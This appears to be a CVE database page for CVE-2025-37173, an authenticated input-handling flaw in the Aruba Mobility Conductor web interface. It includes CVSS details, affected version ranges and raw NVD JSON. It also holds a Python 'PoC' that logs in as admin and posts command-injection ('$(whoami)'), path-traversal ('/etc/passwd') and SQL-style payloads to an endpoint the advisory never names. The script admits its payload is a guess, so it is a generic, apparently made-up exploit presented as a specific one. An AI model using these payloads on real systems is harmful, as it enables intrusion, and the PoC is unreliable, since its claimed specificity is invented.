Security Vulnerability Report
中文
CVE-2025-37173 CVSS 7.2 HIGH

CVE-2025-37173

Published: 2026-01-13 20:16:05
Last Modified: 2026-01-23 16:44:31
Source: [email protected]

Description

An improper input handling vulnerability exists in the web-based management interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation could allow an authenticated malicious actor with valid credentials to trigger unintended behavior on the affected system.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
ArubaOS 10.x (所有低于修复版本的版本)
ArubaOS 8.x (所有低于修复版本的版本)
HPE Aruba Mobility Conductor (具体版本需参照官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-37173 PoC - Improper Input Handling in Aruba Mobility Conductor # This PoC demonstrates the vulnerability in web-based management interface # Note: This requires valid high-privilege credentials import requests import urllib3 urllib3.disable_warnings() TARGET_URL = "https://<aruba-conductor-ip>/v1/" USERNAME = "admin" PASSWORD = "admin_password" def exploit_cve_2025_37173(): """ Exploit for CVE-2025-37173: Improper Input Handling in Aruba Mobility Conductor This vulnerability allows authenticated users to trigger unintended behavior through specially crafted input in the web management interface. """ session = requests.Session() # Step 1: Authentication login_url = f"{TARGET_URL}api/login" login_data = { "username": USERNAME, "password": PASSWORD } try: response = session.post(login_url, json=login_data, verify=False, timeout=10) if response.status_code != 200: print(f"[-] Authentication failed: {response.status_code}") return False print("[+] Successfully authenticated") # Step 2: Send malicious input to trigger vulnerability # The specific payload depends on the vulnerable parameter exploit_url = f"{TARGET_URL}api/configuration" exploit_data = { # Malicious input that bypasses validation "config_param": "'; malicious_payload; --", "system_command": "$(whoami)", "file_path": "../../../etc/passwd" } response = session.post(exploit_url, json=exploit_data, verify=False, timeout=10) if response.status_code == 200 and "error" not in response.text.lower(): print("[+] Vulnerability potentially exploitable") print(f"[>] Response: {response.text}") return True else: print(f"[-] Exploitation failed or patched") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("CVE-2025-37173 Exploitation Script") print("Target: Aruba Mobility Conductor (AOS-10/AOS-8)") print("=" * 50) exploit_cve_2025_37173()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37173", "sourceIdentifier": "[email protected]", "published": "2026-01-13T20:16:05.340", "lastModified": "2026-01-23T16:44:30.923", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper input handling vulnerability exists in the web-based management interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation could allow an authenticated malicious actor with valid credentials to trigger unintended behavior on the affected system."}, {"lang": "es", "value": "Una vulnerabilidad de manejo de entrada inadecuado existe en la interfaz de gestión basada en web de los conductores de movilidad que ejecutan ya sea los sistemas operativos AOS-10 o AOS-8. La explotación exitosa podría permitir a un actor malicioso autenticado con credenciales válidas desencadenar un comportamiento no deseado en el sistema afectado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.5.4.0", "versionEndExcluding": "8.10.0.21", "matchCriteriaId": "187C0AB6-1290-4FE3-9FFE-7317DC57B931"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.11.0.0", "versionEndExcluding": "8.13.1.1", "matchCriteriaId": "1C7390DD-329B-44A3-9693-34211258DF37"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.3.0.0", "versionEndExcluding": "10.4.1.10", "matchCriteriaId": "93E77EBB-E46E-47E5-ADD2-1BD80257B08B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0.0", "versionEndExcluding": "10.7.2.2", "matchCriteriaId": "48B3A810-4DD3-403E-9A76-AB86EF7EA9D1"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.